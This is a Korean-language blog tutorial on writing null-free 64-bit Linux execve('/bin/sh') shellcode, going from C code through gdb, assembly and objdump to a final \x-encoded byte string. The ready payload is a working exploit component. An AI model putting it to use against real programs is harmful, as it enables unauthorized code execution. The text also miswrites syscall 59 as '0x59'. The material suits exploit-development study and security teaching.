64bit Linux Execve Shell Code 만들기
Offensive Security Engineer, Developer and H4cker.
오늘은 64비트 쉘코드에 대한 이야기를 할까 합니다. 예전에 이쪽 분야 관심을 가졌을 초반 쯤에 32bit에 대한 쉘코드를 만들고 사용했었지만 지금은 일 특성상 딱히 쉘코드를 사용할 일이 굉장히 적어졌기에 간만에 보는 느낌입니다.
일단 32bit나 64bit나 직접 assembly 코드를 짜거나, C에서 변환하는 식으로 하는것이 좋습니다.
Write test code
어디에서나 볼 수 있는 매우 간단한 execve를 활요하는 명령 실행 코드를 작성합니다. 어차피 system 함수나 뭘 쓰던 결국은 execve를 통해 시스템 콜을 요청하기 때문에 그냥 바로 execve로 하는게 쉽습니다.
#include <stdlib.h>
int main()
{
execve("/bin/sh",NULL,NULL);
}
매우 간단합니다. 그냥 execve 함수를 통해 /bin/sh를 실행하라고 하는 코드입니다.
Disassembling 하여 Assembly Code 확인하기
해당 코드를 gdb로 disassemble 하여 main 함수를 보면 다음과 같습니다.
(gdb) disas main
Dump of assembler code for function main:
0x000000000040050c <+0>: push %rbp
0x000000000040050d <+1>: mov %rsp,%rbp
0x0000000000400510 <+4>: mov $0x0,%edx
0x0000000000400515 <+9>: mov $0x0,%esi
0x000000000040051a <+14>: mov $0x4005dc,%edi
0x000000000040051f <+19>: callq 0x4003f0 <execve@plt>
0x0000000000400524 <+24>: pop %rbp
0x0000000000400525 <+25>: retq
End of assembler dump.
0x000000000040050c <+0>: push %rbp
0x000000000040050d <+1>: mov %rsp,%rbp
이 부분은 함수 프롤로그(시작) 부분과 같고,
0x0000000000400510 <+4>: mov $0x0,%edx
0x0000000000400515 <+9>: mov $0x0,%esi
0x000000000040051a <+14>: mov $0x4005dc,%edi
이 부분이 우리가 함수를 사용하는 부분 중 인자값에 관련된 부분이 됩니다.
edx, esi에 0x0(NULL)으로 값을 세팅하고 edi에 0x4005dc를 세팅합니다. 0x4005dc는 명령으로 확인해보면 "/bin/sh"인 것을 알 수 있습니다.
(gdb) x/s 0x4005dc
0x4005dc: "/bin/sh"
그리고 세팅된 인자값을 가지고 execve를 call합니다.
0x000000000040051f <+19>: callq 0x4003f0 <execve@plt>
execve는 시스템콜을 이용하여 호출할 수 있고 32비트는 11(0xb), 64비트는 59(0x59)로 정의되어 있습니다. 여기서 우리가 필요한 부분은 인자값을 넣고 함수를 실행하는 부분인데요.
mov $0x0,%edx
mov $0x0,%esi
mov $0x4005dc,%edi
mov $59, $rax
syscall
이런식으로 가면 인자값을 넣고 함수 실행이 가능할 것으로 보입니다. 이 내용을 바탕으로 assem 코드를 작성하면 아래와 같은 모양이 나오겠지요.
Assembly Code 작성하기
아까 위에서 gdb를 통해서 확인한 데이터를 가지고 Assembly 코드를 작성합니다.
.section .data
name: .string "/bin/sh"
.section .text
.global _start
_start:
pushq $0 ;
pushq name ;
movq $59, %rax ;
movq %rsp, %rdi ;
movq $0, %rsi
movq $0, %rdx ;
syscall
여기서 data section에 name이란 이름으로 /bin/sh를 넣어두고
.section .data
name: .string "/bin/sh"
rax에 시스템콜 넘버를 세팅하고, 나머지 자리에 인수를 세팅한 후
movq $59, %rax ;
movq %rsp, %rdi ;
movq $0, %rsi
movq $0, %rdx ;
syscall
syscall을 이용하여 명령을 실행합니다.
as -o shell.o shell.s
ld -o shell shell.o
실행파일로 만들어서 실행해보면 /bin/sh가 실행됨을 확인할 수 있습니다.
./shell
# echo "This is /bin/sh"
This is /bin/sh
일단 Assembly 코드를 이용해 다시 컴파일 하고 실행하여서 /bin/sh가 실행되는것으로 보아 문제없이 잘 작성한 것으로 보이네요.
Objdump를 이용하여 기계어 확인하기
분석에서도 많이 사용되는 objdump를 이용해서 Assembly를 이용해 만든 실행파일을 까서 봅니다. -d 옵션으로 볼 수 있습니다.
objdump shell -d
shell: file format elf64-x86-64
Disassembly of section .text:
00000000004000b0 <_start>:
4000b0: 6a 00 pushq $0x0
4000b2: ff 34 25 d4 00 60 00 pushq 0x6000d4
4000b9: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
4000c0: 48 89 e7 mov %rsp,%rdi
4000c3: 48 c7 c6 00 00 00 00 mov $0x0,%rsi
4000ca: 48 c7 c2 00 00 00 00 mov $0x0,%rdx
4000d1: 0f 05 syscall
일단 여기까지 확인한 데이터로 쉘코드로 사용이 가능은 합니다만. strcpy 같이 문자열을 처리하는 함수중에 0x00을 만났을 시 끝 부분으로 인지하는 함수들이 많습니다. 그래서 좋은 쉘코드 작성을 위해서는 Null Byte(0x00)에 대한 제거가 필요합니다.
Null Byte 제거하기
여러번의 테스트를 위해서 그냥 컴파일 과정+objdump까지 한 명령행으로 묶어 사용하면 조금 편합니다.
as -o shell.o shell.s;ld -o shell shell.o;objdump -d shell
.section .data
name: .string "/bin/sh"
.section .text
.global _start
_start:
pushq name
movq $59, %rax
mov %rsp, %rdi
movq $0, %rsi
movq $0, %rdx
syscall
일단 굳이 필요없는 부분은 제거해도 될 것 같아 테스트하면서 좀 지워봤습니다. 일단 execve가 인자값이 3개로 넣어줬는데, 사실 이거 한개로도 동작이 가능하기 때문이죠. rax에 system call number를 넘겨주고 인자값 하나에만 명령행을 넘겨줘도 일단 동작은 가능합니다.
cat shell.s
.section .data
name: .string "/bin/sh"
.section .text
.global _start
_start:
pushq name
movq $59, %rax
mov %rsp, %rdi
#movq $0, %rsi
#movq $0, %rdx
syscall
as -o shell.o shell.s;ld -o shell shell.o;objdump -d shell
shell: file format elf64-x86-64
Disassembly of section .text:
00000000004000b0 <_start>:
4000b0: ff 34 25 c4 00 60 00 pushq 0x6000c4
4000b7: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
4000be: 48 89 e7 mov %rsp,%rdi
4000c1: 0f 05 syscall
./shell
# exit
코드길이가 쬐끔 줄었네요. 실행했을때도 별 이상이 없습니다. 이제 Null byte의 위치를 보면 pushq 랑 2번째 mov에서 발생 합니다. 32bit는 xor로 가능하지만.. 64bit에서는 안타깝게도 불가능합니다.
xor %eax, %eax
movb 0xb, %al
해결을 위해서 여러가지 자료를 찾아봤습니다. 찾아보니 shift 연산을 이용하서 64bit에서도 null을 제거할 수 있는 방법이 있더군요.
cat shell.s
.section .data
name: .string "/bin/sh"
.section .text
.global _start
_start:
# pushq name
# string Null byte remove
movabs $0x1168732f6e69622f, %rbx
shl $0x08, %rbx
shr $0x08, %rbx
push %rbx
# movq $59, %rax
# rax(system call) Null Byte remove
movq $0x1111113b, %rax
mov %rsp, %rdi
shl $0x38, %rax
shr $0x38, %rax
syscall
Null이 발생하던 /bin/sh를 꺼내어 넣는부분과, eax에 system call을 주는 부분을 위와 같이 shift 연산을 통해 null이 없는 형태로 구현할 수 있습니다. 이에 대한 자세한 내용은 이 링크를 참고해주세요.
아까 테스트를 위해 사용하던 명령으로 컴파일 및 objdump로 확인을 하면
as -o shell.o shell.s;ld -o shell shell.o;objdump -d shell
shell: file format elf64-x86-64
Disassembly of section .text:
00000000004000b0 <_start>:
4000b0: 48 bb 2f 62 69 6e 2f movabs $0x1168732f6e69622f,%rbx
4000b7: 73 68 11
4000ba: 48 c1 e3 08 shl $0x8,%rbx
4000be: 48 c1 eb 08 shr $0x8,%rbx
4000c2: 53 push %rbx
4000c3: 48 c7 c0 3b 11 11 11 mov $0x1111113b,%rax
4000ca: 48 89 e7 mov %rsp,%rdi
4000cd: 48 c1 e0 38 shl $0x38,%rax
4000d1: 48 c1 e8 38 shr $0x38,%rax
4000d5: 0f 05 syscall
Null Byte가 사라진 것을 알 수 있습니다. 정상 구동이 되는지 테스트를 해보면 /bin/sh이 실행되는 것을 확인할 수 있습니다.
./shell
# ls
# shell shell.o shell.s
이제 objdump로 보인 데이터를 shell code로 만들 시간이네요. 저 데이터를 순서대로 써주어 하나의 문자열을 만들면 됩니다. 처음엔 직접하는게 좋겠지만.. 점점 귀찮기 때문에 nasm과 hexdump로 쉽게 뽑아낼 수 있습니다.
길지 않으니 !표로 나누어 쓰고 대부분 텍스트에디터 기능에 있는 찾아 바꾸기 기능을 이용해서 \x로 바꿔주면 편합니다.
!48!bb!2f!62!69!6e!2f!73!68!11!48!c1!e3!08!48!c1!eb!08!53!48!c7!c0!3b!11!11!11!48!89!e7!48!c1!e0!38!48!c1!e8!38!0f!05
! to \x
\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe3\x08\x48\xc1\xeb\x08\x53\x48\xc7\xc0\x3b\x11\x11\x11\x48\x89\xe7\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
32bit랑은 다른 부분이 있기에 알아두면 좋을 것 같습니다 :D